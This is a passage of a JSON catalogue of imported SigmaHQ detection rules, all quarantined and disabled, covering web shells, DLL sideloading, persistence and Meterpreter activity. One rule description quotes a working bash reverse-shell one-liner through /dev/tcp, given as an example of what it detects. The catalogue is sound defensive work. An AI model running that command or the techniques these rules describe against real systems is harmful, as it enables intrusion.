], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-webshell-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "818f7b24-0fba-4c49-a073-8b755573b9c7", "source_commit": "df5c6a6", "license": "DRL-1.1", 
"license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml" } }, { "id": "sigmahq-sigma-818fee0c-e0ec-4e45-824e-83e4817b0887", "type": "detection", "name": "Azure Kubernetes Sensitive Role Access", "description": "Identifies when ClusterRoles/Roles are being modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1496", "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-kubernetes-sensitive-role-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "818fee0c-e0ec-4e45-824e-83e4817b0887", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_kubernetes_role_access.yml" } }, { "id": "sigmahq-sigma-81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", "type": "detection", "name": "Add Insecure Download Source To Winget", "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-insecure-download-source-to-winget.yaml", "quarantine_reason": "imported rule; upstream query language 
not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml" } }, { "id": "sigmahq-sigma-81bcb81b-5b1f-474b-b373-52c871aaa7b1", "type": "detection", "name": "Stop Windows Service Via Sc.EXE", "description": "Detects the stopping of a Windows service via the \"sc.exe\" utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/stop-windows-service-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "81bcb81b-5b1f-474b-b373-52c871aaa7b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_stop_service.yml" } }, { "id": "sigmahq-sigma-81ebd28b-9607-4478-bf06-974ed9d53ed7", "type": "detection", "name": "Potential Application Whitelisting Bypass via Dnx.EXE", "description": "Detects the execution of Dnx.EXE. 
The Dnx utility allows for the execution of C# code.\nAttackers might abuse this in order to bypass application whitelisting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1027.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-application-whitelisting-bypass-via-dnx-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_dnx_execute_csharp_code.yml" } }, { "id": "sigmahq-sigma-8202070f-edeb-4d31-a010-a26c72ac5600", "type": "detection", "name": "Suspicious Process By Web Server Process", "description": "Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003", "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-process-by-web-server-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8202070f-edeb-4d31-a010-a26c72ac5600", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml" } }, { "id": "sigmahq-sigma-8218c875-90b9-42e2-b60d-0b0069816d10", "type": "detection", "name": "PowerShell Script Execution Policy Enabled", "description": "Detects the enabling of the PowerShell script execution policy. Once enabled, this policy allows scripts to be executed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-script-execution-policy-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8218c875-90b9-42e2-b60d-0b0069816d10", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_powershell_enablescripts_enabled.yml" } }, { "id": "sigmahq-sigma-821b4dc3-1295-41e7-b157-39ab212dd6bd", "type": "detection", "name": "Sign-In From Malware Infected IP", "description": "Indicates sign-ins from IP addresses infected with malware that is known to actively communicate with a bot server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sign-in-from-malware-infected-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "821b4dc3-1295-41e7-b157-39ab212dd6bd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/identity_protection/azure_identity_protection_malware_linked_ip.yml" } }, { "id": "sigmahq-sigma-821bcf4d-46c7-4b87-bc57-9509d3ba7c11", "type": "detection", "name": "Root Account Enable Via Dsenableroot", "description": "Detects attempts to enable the root account via \"dsenableroot\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1078.001", "T1078.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/root-account-enable-via-dsenableroot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "821bcf4d-46c7-4b87-bc57-9509d3ba7c11", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_dsenableroot_enable_root_account.yml" } }, { "id": "sigmahq-sigma-82343930-652f-43f5-ab70-2ee9fdd6d5e9", "type": "detection", "name": "Potential ShellDispatch.DLL Functionality Abuse", "description": "Detects potential \"ShellDispatch.dll\" functionality abuse to execute arbitrary binaries via \"ShellExecute\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/potential-shelldispatch-dll-functionality-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "82343930-652f-43f5-ab70-2ee9fdd6d5e9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_shelldispatch_potential_abuse.yml" } }, { "id": "sigmahq-sigma-82880171-b475-4201-b811-e9c826cd5eaa", "type": "detection", "name": "Exports Critical Registry Keys To a File", "description": "Detects the export of a critical Registry key to a file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/exports-critical-registry-keys-to-a-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "82880171-b475-4201-b811-e9c826cd5eaa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regedit_export_critical_keys.yml" } }, { "id": "sigmahq-sigma-8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "type": "detection", "name": "Unsigned Binary Loaded From Suspicious Location", "description": "Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", 
"mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/unsigned-binary-loaded-from-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml" } }, { "id": "sigmahq-sigma-828af599-4c53-4ed2-ba4a-a9f835c434ea", "type": "detection", "name": "Fax Service DLL Search Order Hijack", "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fax-service-dll-search-order-hijack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_ualapi.yml" } }, { "id": "sigmahq-sigma-829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "type": "detection", "name": "Microsoft Office DLL Sideload", "description": "Detects DLL sideloading of DLLs 
that are part of Microsoft Office from non standard location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-office-dll-sideload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_office_dlls.yml" } }, { "id": "sigmahq-sigma-82a6714f-4899-4f16-9c1e-9a333544d4c3", "type": "detection", "name": "File In Suspicious Location Encoded To Base64 Via Certutil.EXE", "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64 where the files are located in potentially suspicious locations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-in-suspicious-location-encoded-to-base64-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "82a6714f-4899-4f16-9c1e-9a333544d4c3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_certutil_encode_susp_location.yml" } }, { "id": "sigmahq-sigma-833ef470-fa01-4631-a79b-6f291c9ac498", "type": "detection", "name": "Add Debugger Entry To Hangs Key For Persistence", "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/add-debugger-entry-to-hangs-key-for-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "833ef470-fa01-4631-a79b-6f291c9ac498", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml" } }, { "id": "sigmahq-sigma-8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf", "type": "detection", "name": "Potential Discovery Activity Using Find - Linux", "description": "Detects usage of \"find\" binary in a suspicious manner to perform discovery", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-discovery-activity-using-find-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", 
"source_id": "8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml" } }, { "id": "sigmahq-sigma-835747f1-9329-40b5-9cc3-97d465754ce6", "type": "detection", "name": "Azure Application Security Group Modified or Deleted", "description": "Identifies when an application security group is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-application-security-group-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "835747f1-9329-40b5-9cc3-97d465754ce6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_application_security_group_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", "type": "detection", "name": "Uncommon Child Process Of Setres.EXE", "description": "Detects uncommon child process of Setres.EXE.\nSetres.EXE is a Windows server only process and tool that can be used to set the screen resolution.\nIt can potentially be abused in order to launch any arbitrary file with a name containing the word \"choice\" from the current execution path.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218", "T1202" ], "log_source": null, "playbook": 
null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-child-process-of-setres-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_setres_uncommon_child_process.yml" } }, { "id": "sigmahq-sigma-8366030e-7216-476b-9927-271d79f13cf3", "type": "detection", "name": "Azure Unusual Authentication Interruption", "description": "Detects when there is an interruption in the authentication process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-unusual-authentication-interruption.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8366030e-7216-476b-9927-271d79f13cf3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_unusual_authentication_interruption.yml" } }, { "id": "sigmahq-sigma-83809e84-4475-4b69-bc3e-4aad8568612f", "type": "detection", "name": "MSExchange Transport Agent Installation", "description": "Detects the Installation of an Exchange Transport Agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": 
"_quarantine", "mitre_techniques": [ "T1505.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/msexchange-transport-agent-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "83809e84-4475-4b69-bc3e-4aad8568612f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml" } }, { "id": "sigmahq-sigma-83844185-1c5b-45bc-bcf3-b5bf3084ca5b", "type": "detection", "name": "Suspicious Encoded Scripts in a WMI Consumer", "description": "Detects suspicious encoded payloads in WMI Event Consumers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1047", "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-encoded-scripts-in-a-wmi-consumer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml" } }, { "id": "sigmahq-sigma-8384bd26-bde6-4da9-8e5d-4174a7a47ca2", "type": "detection", "name": "Query Tor Onion Address - DNS Client", "description": "Detects DNS resolution of an .onion address related to Tor routing networks", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1090.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/query-tor-onion-address-dns-client.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/dns_client/win_dns_client_tor_onion.yml" } }, { "id": "sigmahq-sigma-83865853-59aa-449e-9600-74b9d89a6d6e", "type": "detection", "name": "Audio Capture via SoundRecorder", "description": "Detect attacker collecting audio via SoundRecorder application.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1123" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/audio-capture-via-soundrecorder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "83865853-59aa-449e-9600-74b9d89a6d6e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_soundrecorder_audio_capture.yml" } }, { "id": "sigmahq-sigma-83c161b6-ca67-4f33-8ad0-644a0737cf07", "type": "detection", "name": "Suspicious Application Installed", "description": "Detects suspicious application 
installed by looking at the added shortcut to the app resolver cache", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-application-installed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml" } }, { "id": "sigmahq-sigma-83c17918-746e-4bd9-920b-8e098bf88c23", "type": "detection", "name": "Azure Network Firewall Policy Modified or Deleted", "description": "Identifies when a Firewall Policy is Modified or Deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-network-firewall-policy-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "83c17918-746e-4bd9-920b-8e098bf88c23", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_network_firewall_policy_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", 
"type": "detection", "name": "Linux Reverse Shell Indicator", "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-reverse-shell-indicator.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml" } }, { "id": "sigmahq-sigma-84232095-ecca-4015-b0d7-7726507ee793", "type": "detection", "name": "Suspicious DLL Loaded via CertOC.EXE", "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dll-loaded-via-certoc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "84232095-ecca-4015-b0d7-7726507ee793", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/process_creation/proc_creation_win_certoc_load_dll_susp_locations.yml" } }, { "id": "sigmahq-sigma-843544a7-56e0-4dcc-a44f-5cc266dd97d6", "type": "detection", "name": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1134.001", "T1134.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/meterpreter-or-cobalt-strike-getsystem-service-installation-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" } }, { "id": "sigmahq-sigma-844f8eb2-610b-42c8-89a4-47596e089663", "type": "detection", "name": "Potential ShellDispatch.DLL Sideloading", "description": "Detects potential DLL sideloading of \"ShellDispatch.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-shelldispatch-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "SigmaHQ/sigma", "source_id": "844f8eb2-610b-42c8-89a4-47596e089663", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_shelldispatch.yml" } }, { "id": "sigmahq-sigma-8468111a-ef07-4654-903b-b863a80bbc95", "type": "detection", "name": "VHD Image Download Via Browser", "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1587.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vhd-image-download-via-browser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "8468111a-ef07-4654-903b-b863a80bbc95", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_vhd_download_via_browsers.yml" } }, { "id": "sigmahq-sigma-846c7a87-8e14-4569-9d49-ecfd4276a01c", "type": "detection", "name": "DSInternals Suspicious PowerShell Cmdlets - ScriptBlock", "description": "Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.\nThe DSInternals PowerShell Module exposes several internal 